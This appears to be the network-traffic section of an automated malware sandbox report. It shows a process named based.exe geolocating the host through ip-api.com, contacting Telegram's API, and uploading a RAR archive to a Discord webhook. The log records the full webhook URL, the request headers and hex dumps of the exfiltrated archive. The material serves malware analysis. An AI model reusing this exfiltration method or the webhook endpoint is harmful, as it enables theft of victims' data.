                                                                                                  Aug 2, 2024 00:08:04.213812113 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213828087 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213840961 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213862896 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213871956 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213882923 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213896990 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213929892 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213948965 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213968992 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213977098 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.213989019 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.213999987 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.214024067 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214035988 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.214060068 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214073896 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.214086056 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214102983 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214131117 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214140892 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214162111 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214174986 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214189053 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214200974 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214231968 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214266062 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214284897 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.214299917 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.224395037 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.228104115 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228132963 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.228147030 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228153944 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.228174925 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228188038 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.228197098 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228202105 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.228225946 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228225946 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228231907 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.228250027 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228257895 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.228279114 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228286982 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.228301048 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228347063 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228367090 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228411913 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.228423119 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.229589939 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.906225920 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.906375885 CEST44349743162.159.138.232192.168.2.4
                                                                                                  Aug 2, 2024 00:08:04.906565905 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:04.907308102 CEST49743443192.168.2.4162.159.138.232
                                                                                                  Aug 2, 2024 00:08:05.270561934 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.270617962 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.270804882 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.302113056 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.302169085 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.959857941 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.966329098 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.966387987 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.968072891 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.968151093 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.968797922 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.968898058 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.969119072 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.969135046 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.969191074 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.969227076 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.969326973 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.969374895 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.969522953 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.969574928 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.969712019 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.969738960 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.969779968 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.969795942 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.969847918 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.969870090 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970026970 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970041037 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970072985 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970091105 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970098972 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970112085 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970154047 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970171928 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970196962 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970211029 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970233917 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970247030 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970268011 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970280886 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970325947 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970360041 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970386028 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970402002 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970436096 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970453978 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970482111 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970498085 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970520973 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970534086 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970572948 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970572948 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970592976 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970612049 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970660925 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970679998 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.970709085 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970746994 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970777035 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970808983 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970844030 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970865011 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970896006 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970930099 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970963955 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.970979929 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.971023083 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.971062899 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.971085072 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.971113920 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.971148014 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.971182108 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.971182108 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.979768038 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.979934931 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.979963064 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.980472088 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.980504036 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.980535984 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.980551004 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:05.984945059 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:07.033695936 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:07.033723116 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:07.033817053 CEST44349745149.154.167.220192.168.2.4
                                                                                                  Aug 2, 2024 00:08:07.033819914 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:07.033879042 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:07.034463882 CEST49745443192.168.2.4149.154.167.220
                                                                                                  Aug 2, 2024 00:08:10.468120098 CEST4974280192.168.2.4208.95.112.1
                                                                                                  Aug 2, 2024 00:08:10.473584890 CEST8049742208.95.112.1192.168.2.4
                                                                                                  Aug 2, 2024 00:08:10.473674059 CEST4974280192.168.2.4208.95.112.1
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Aug 2, 2024 00:08:02.579116106 CEST5428953192.168.2.41.1.1.1
                                                                                                  Aug 2, 2024 00:08:02.586817980 CEST53542891.1.1.1192.168.2.4
                                                                                                  Aug 2, 2024 00:08:03.327028990 CEST5869553192.168.2.41.1.1.1
                                                                                                  Aug 2, 2024 00:08:03.568377972 CEST53586951.1.1.1192.168.2.4
                                                                                                  Aug 2, 2024 00:08:05.262242079 CEST5717253192.168.2.41.1.1.1
                                                                                                  Aug 2, 2024 00:08:05.269676924 CEST53571721.1.1.1192.168.2.4
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Aug 2, 2024 00:08:02.579116106 CEST192.168.2.41.1.1.10x8a9dStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                  Aug 2, 2024 00:08:03.327028990 CEST192.168.2.41.1.1.10x76eeStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                  Aug 2, 2024 00:08:05.262242079 CEST192.168.2.41.1.1.10x6addStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Aug 2, 2024 00:08:02.586817980 CEST1.1.1.1192.168.2.40x8a9dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                  Aug 2, 2024 00:08:03.568377972 CEST1.1.1.1192.168.2.40x76eeNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                  Aug 2, 2024 00:08:03.568377972 CEST1.1.1.1192.168.2.40x76eeNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                  Aug 2, 2024 00:08:03.568377972 CEST1.1.1.1192.168.2.40x76eeNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                  Aug 2, 2024 00:08:03.568377972 CEST1.1.1.1192.168.2.40x76eeNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                  Aug 2, 2024 00:08:03.568377972 CEST1.1.1.1192.168.2.40x76eeNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                  Aug 2, 2024 00:08:05.269676924 CEST1.1.1.1192.168.2.40x6addNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                  • discord.com
                                                                                                  • api.telegram.org
                                                                                                  • ip-api.com
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449742208.95.112.1806900C:\ProgramData\Microsoft\based.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Aug 2, 2024 00:08:02.592679024 CEST116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                  Host: ip-api.com
                                                                                                  Accept-Encoding: identity
                                                                                                  User-Agent: python-urllib3/2.2.2
                                                                                                  Aug 2, 2024 00:08:03.163827896 CEST379INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 01 Aug 2024 22:08:02 GMT
                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                  Content-Length: 202
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  X-Ttl: 60
                                                                                                  X-Rl: 44
                                                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                                                  Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449743162.159.138.2324436900C:\ProgramData\Microsoft\based.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-08-01 22:08:04 UTC302OUTPOST /api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya HTTP/1.1
                                                                                                  Host: discord.com
                                                                                                  Accept-Encoding: identity
                                                                                                  Content-Length: 693785
                                                                                                  User-Agent: python-urllib3/2.2.2
                                                                                                  Content-Type: multipart/form-data; boundary=720bf38bf17272696e0e8c38b6636f8d
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: 2d 2d 37 32 30 62 66 33 38 62 66 31 37 32 37 32 36 39 36 65 30 65 38 63 33 38 62 36 36 33 36 66 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 39 19 9b 57 21 04 00 00 01 0f 3d 07 9e 02 22 8a 83 18 9c 6e 12 8d b8 4a ec cf 48 aa bc 68 db 08 0b bf 7b cf 99 8c f0 76 b3 e6 c0 83 a1 2e d1 8c a9 54 97 e9 73 a1 ad f3 6e f3 cd 21 bd 88 ab f9 2a ec 72 58 e7 19 d7 cd f7 92 3d 63 5a 0e 32 49 fa 4f cc ab 2a 83 54 89 51 02 37
                                                                                                  Data Ascii: --720bf38bf17272696e0e8c38b6636f8dContent-Disposition: form-data; name="file"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!9W!="nJHh{v.Tsn!*rX=cZ2IO*TQ7
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: 37 e3 2a 06 f8 83 d4 32 d4 01 38 97 78 04 ce d0 76 65 97 ea e6 0a aa 55 3c 51 3f e3 7e 57 eb 2c a0 d4 d2 07 86 cc 2e cd e3 c1 69 08 58 e8 ac 52 59 3a 00 5e 3d 89 9b 31 c4 0f e2 66 45 9e 98 a3 10 61 e0 20 9a 64 82 68 98 a7 79 bc e3 63 3b cd d5 22 b0 dc 9e 4d 96 09 46 35 3f 83 a9 ea e5 1f 77 ec 5c 80 0f 59 2a e6 e7 98 d4 05 90 45 49 76 a4 7f 1a 0e 79 0d bb 56 59 32 2c d2 ac 99 e0 41 8a b8 d8 f9 c2 8e 99 c5 4f ef 67 66 9a cb 11 48 42 7e 64 20 52 5d 9c 7a 77 f0 ab b0 67 e3 7c 4f f8 72 03 22 3b 48 b4 57 1e a8 c5 21 fa ae c5 18 47 ed 76 6d 16 4b 7a 36 f5 1c 2e e2 9d 84 7e a5 d8 b1 a2 0a d3 74 0f e4 02 be e0 8d 07 d0 65 b6 60 15 ab 84 b4 ec ef f0 e4 ea 05 3d 90 0d 24 38 fc c1 66 b6 b3 65 01 69 4d d6 a7 4a d6 84 5e 5e cc ae fc 0a d9 22 5d 73 3d 53 14 0a ba bc 7f
                                                                                                  Data Ascii: 7*28xveU<Q?~W,.iXRY:^=1fEa dhyc;"MF5?w\Y*EIvyVY2,AOgfHB~d R]zwg|Or";HW!GvmKz6.~te`=$8feiMJ^^"]s=S
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: 4b 43 0e 58 51 8b b1 de 55 4c df d0 32 d5 98 e3 55 9c 1a 97 3c 45 f8 f4 ae 65 05 82 a8 f3 5f b4 7a 89 21 10 fa 5f 14 4a 4d f4 0c 6c 53 c3 6b c3 91 ff c6 36 eb c0 c5 24 1e 70 7b f8 5f 09 82 fb f9 ee 34 2e 33 a3 58 53 85 8b 96 ac 19 61 ff c1 91 84 12 b6 59 5d 80 c5 de 3f cc 1c 19 b3 5a 1b 89 68 7c 5d 6a 70 4f ec 8d 5c 0e 12 76 a9 5a 3f 55 13 12 60 c2 c7 68 85 71 32 82 cd 2b 6d a9 ec a0 50 86 09 8a ac f3 db 1e 55 8e 1a fa 2a d2 c9 65 80 ef 6b a7 6b e8 4e 4e 9a 6c 47 bf 59 24 94 63 2f 0c 5a b3 87 56 4a 8a 31 96 d2 d2 27 a2 dd 32 8a f3 ec a8 3c 5d d3 40 d4 63 74 8b 88 18 ba 43 fe 99 db 3c 47 8b 0c 34 0c 37 12 04 b9 88 76 ec 17 03 06 ff f9 41 44 a3 88 43 90 e5 e4 c9 57 0c d6 7a 47 e2 28 08 ef 9f c9 41 bb b3 d6 1a 02 24 a8 5f 61 65 e1 00 0e 05 86 40 1f f5 b7 6f
                                                                                                  Data Ascii: KCXQUL2U<Ee_z!_JMlSk6$p{_4.3XSaY]?Zh|]jpO\vZ?U`hq2+mPU*ekkNNlGY$c/ZVJ1'2<]@ctC<G47vADCWzG(A$_ae@o
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: 46 e7 8f 8e 47 df 67 71 80 66 91 35 1f 85 09 e6 9c f6 5b 91 01 b6 f2 8d 9f 69 2e dd 99 d9 84 fd 1b 33 15 f8 19 51 f8 02 b6 56 41 f5 86 7a ea 09 58 9c f5 4c 81 0b 65 72 40 e3 0b 48 20 6c 5c 8c 05 cd d6 9c cd 77 60 8f 33 13 56 a1 65 f3 ae 4f 46 38 06 08 0d 1a ee d5 93 58 9e 3b b7 1d 8e f5 34 7b 3d 33 f6 35 42 29 f3 aa e3 74 7c b9 61 ad 4d 85 b1 36 29 d1 bd 22 01 3c de 5a 52 64 8d 9a cc 74 e8 c7 68 f3 50 68 e8 a0 72 03 1a 1c 0f 63 45 93 4b 01 15 ca 2e d2 1f 93 19 06 13 71 0e c8 a8 45 4b 44 99 68 c3 7c 32 7c 23 d3 f3 b3 6b 1e 06 ce e2 8b ed f8 41 c2 7d 09 e4 c8 f3 a3 45 de e4 54 e7 73 91 f5 40 ce 94 84 02 1e cb 41 ec 73 f6 7f 8e 12 24 23 94 f1 45 b1 73 60 84 d2 7f 08 c1 36 f8 af 68 4b 72 3a ea 15 5c b8 6e 6a cc e8 6f 8e f1 7a 29 27 1d b4 90 08 e1 4a 3a 25 eb
                                                                                                  Data Ascii: FGgqf5[i.3QVAzXLer@H l\w`3VeOF8X;4{=35B)t|aM6)"<ZRdthPhrcEK.qEKDh|2|#kA}ETs@As$#Es`6hKr:\njoz)'J:%
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: 53 c2 3d 41 9f 65 06 f3 59 ac ac 41 e8 a5 b6 77 23 06 74 be 11 59 82 83 a5 3d 54 a7 af f2 5f 24 58 aa 96 71 76 ee 4b c7 33 a3 e0 e6 3f ae fe f5 be 36 65 02 94 74 42 10 65 a8 d7 3b 3d f2 83 ac 8d a6 62 79 95 f6 b3 04 7a c1 4d e1 7f 27 f1 c6 2b 80 90 b1 b0 87 a3 ce 3a 7e 9e 99 a6 40 e1 71 ce be 4d 1c b4 9a 48 0f c0 97 ef e4 46 b8 2f e1 e0 de f7 0b ee fe bb 72 26 0d 13 03 b4 e9 4b d6 b4 3e d0 a8 58 92 77 ad 5d b4 ee 11 49 88 2e 08 18 c2 2d d3 24 bc 27 38 18 09 87 9d bc f2 94 c8 8e 8f f9 45 f5 91 b4 49 c2 2a d8 09 c1 77 44 7d 4c 43 a6 cf 47 69 cb b9 26 f6 71 ad 34 f4 f3 cb d3 af 45 d4 a3 8e 42 aa 38 c4 0a e9 85 11 d6 08 f5 1a ac 6e c1 aa f8 5e 4b 89 b9 a6 15 76 7e 7b 11 3a c7 8b a3 e4 d7 b1 93 c3 92 56 e3 71 f7 91 8e f8 c4 b2 99 d7 79 04 20 06 17 22 33 5b d6
                                                                                                  Data Ascii: S=AeYAw#tY=T_$XqvK3?6etBe;=byzM'+:~@qMHF/r&K>Xw]I.-$'8EI*wD}LCGi&q4EB8n^Kv~{:Vqy "3[
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: cb 2f 13 b2 7f a1 b3 13 d5 52 93 fe 83 51 a5 a1 ba 58 67 02 73 80 24 fa 22 fb f0 66 af d3 c6 76 2a 72 04 bb 69 f5 a5 bb 56 16 94 56 6f 81 dd b1 1b d6 2c 3a 35 29 d8 64 f0 f0 84 fe 99 d4 b4 08 e5 fc e1 6c 06 ba 8e 8d 76 af d8 70 f1 27 5f a5 7d 47 b9 51 c4 8d b5 f6 4e c4 1f 58 45 d1 c1 60 50 1e cd 90 55 34 c7 2e da 23 4a 11 a6 e2 4c b4 9d 5c 15 90 38 03 73 b4 e2 42 4a d4 58 f5 57 db 9b f1 ce 8c ba aa be 0b 75 70 d6 f8 1f ba 8e 09 4f 7a da 05 0f a7 cb 33 43 68 96 39 6d 36 bc de 7c 53 be ce 93 5e d6 e0 76 05 b8 64 1c 25 6c 0a d5 8a 42 77 29 d5 ba c4 88 cf a1 4a d0 fa 8e 2c 65 41 77 7a ad 72 5f 1e 97 48 50 82 fa 76 8a c7 1d 5e 52 15 00 0e 06 27 e0 a7 46 82 1e 38 91 d3 9e f6 5a 51 2d 1b 15 b1 72 8d ff 2d ec 32 4f b9 48 60 43 74 80 98 fe 75 07 81 21 65 5e 06 84
                                                                                                  Data Ascii: /RQXgs$"fv*riVVo,:5)dlvp'_}GQNXE`PU4.#JL\8sBJXWupOz3Ch9m6|S^vd%lBw)J,eAwzr_HPv^R'F8ZQ-r-2OH`Ctu!e^
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: 06 21 86 2d b8 ca f1 ea ea d7 b5 71 9e da ff 37 ba 8d 3d be 66 7f ec 60 17 86 c1 55 bc 39 72 2f c3 76 ba b9 0a 92 31 b0 b0 db cf 56 2b 77 ff c5 45 47 36 bf dc 5f 65 5d 56 15 e6 6f 4a 83 14 62 03 5c 17 19 ac 9d dd b7 17 56 4c 9c 8b 8e 4e a1 98 3b a4 59 4a 1e b2 17 8c f4 03 81 d0 d5 42 62 7a 6d f7 79 f2 bf dc 70 74 43 20 e3 49 55 d9 44 46 3c a8 0d 7b 03 f3 12 22 af f7 3d bd dc 20 84 b4 0a 3f 62 2e 0a ce e4 ef 8b 98 89 6a 03 df f3 8f b3 b1 f5 23 1c 6b 80 74 37 9c 50 bc dd 38 93 cf c5 b0 69 d9 52 e4 83 0c 9d 6d 81 d0 93 23 51 53 6d ce e1 6d e9 83 7f 92 09 ec 8f ee 66 83 3f 34 38 e9 52 c8 84 47 73 ac 21 be 35 46 1e 84 50 d9 5e c0 8b ce 55 18 9a ad 20 12 46 dd 6e 68 fd ef a8 b8 0d 5d 27 76 de 58 20 18 4b eb 30 62 01 20 0b 06 2f 7e fa 93 d5 f0 9f 7d 30 9b 92 fc
                                                                                                  Data Ascii: !-q7=f`U9r/v1V+wEG6_e]VoJb\VLN;YJBbzmyptC IUDF<{"= ?b.j#kt7P8iRm#QSmmf?48RGs!5FP^U Fnh]'vX K0b /~}0
